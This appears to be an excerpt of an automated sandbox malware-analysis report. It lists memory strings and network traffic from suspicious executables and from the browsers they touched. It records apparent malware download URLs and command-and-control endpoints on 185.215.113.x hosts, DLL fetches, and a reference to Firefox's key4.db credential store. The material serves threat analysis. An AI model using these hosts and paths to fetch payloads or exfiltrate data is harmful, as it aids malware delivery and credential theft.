Source: firefox.exe, 00000031.00000002.3317267748.0000024F701E2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: chrome.exe, 00000022.00000002.2998105902.00006DEC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2884906615.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3079191022.00006DEC00F44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000022.00000002.2998105902.00006DEC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2884906615.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3079191022.00006DEC00F44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/network/simple-stream-listener;1_finalizeInternal/this._finalizePromise<http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s@mozilla.org/network/input-stream-pump;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULL equals www.yahoo.com (Yahoo)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F701E2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000003.2872705809.00006DEC006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998389906.00006DEC00412000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000003.2872705809.00006DEC006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998389906.00006DEC00412000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000022.00000002.2995695157.00006DEC002C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3342513448.0000024F70E31000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic	DNS traffic detected: DNS query: property-imper.sbs
Source: global traffic	DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs

Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.css
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.jpg
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3127317780.0000024F6446D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/=Gg
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Ng
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/O
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/W
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exeb
Source: file.exe, 00000000.00000002.2154371815.0000000023462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeJ
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exem
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3100558424.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3094604903.0000000001653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 0718eb7837.exe, 00000010.00000002.3090301764.00000000011CA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
Source: 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exestoreek
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe9
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3097894570.00000000016B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe
Source: 0718eb7837.exe, 00000010.00000002.3094604903.0000000001641000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16:80/off/def.exeault-release/key4.dbPK
Source: file.exe, 00000000.00000002.2130376795.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2129788119.000000000074E000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.00000000016A1000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B17000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/2
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllM
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllm
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll_
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll?
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll?
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.00000000016A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/H
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/RRC:
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php.%
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.00000000016A1000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/K
Source: file.exe, 00000000.00000003.1903996333.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php9
Source: file.exe, 00000000.00000003.1903996333.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php9o
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:%
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpHu8
Source: file.exe, 00000000.00000003.1903996333.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpJ
Source: file.exe, 00000000.00000002.2129788119.0000000000796000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpK
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpN_)
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpR%
Source: file.exe, 00000000.00000002.2129788119.0000000000796000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpW
Source: file.exe, 00000000.00000002.2154371815.0000000023462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpamespace
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpi
Source: file.exe, 00000000.00000002.2130376795.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpn$
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpq
Source: file.exe, 00000000.00000002.2129788119.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phprowser
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.00000000016A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpz
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/h
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/n
Source: aedbd2e320.exe, 0000000F.00000002.2743981437.0000000001698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ta
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ws
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206A
Source: file.exe, 00000000.00000002.2129788119.000000000074E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206C
Source: file.exe, 00000000.00000002.2130376795.0000000000CC5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206ones
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 0000000B.00000002.3095371206.000000000151D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.3095371206.00000000014ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 0000000B.00000002.3095371206.00000000014ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php(
Source: skotes.exe, 0000000B.00000002.3095371206.000000000150B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php8254001
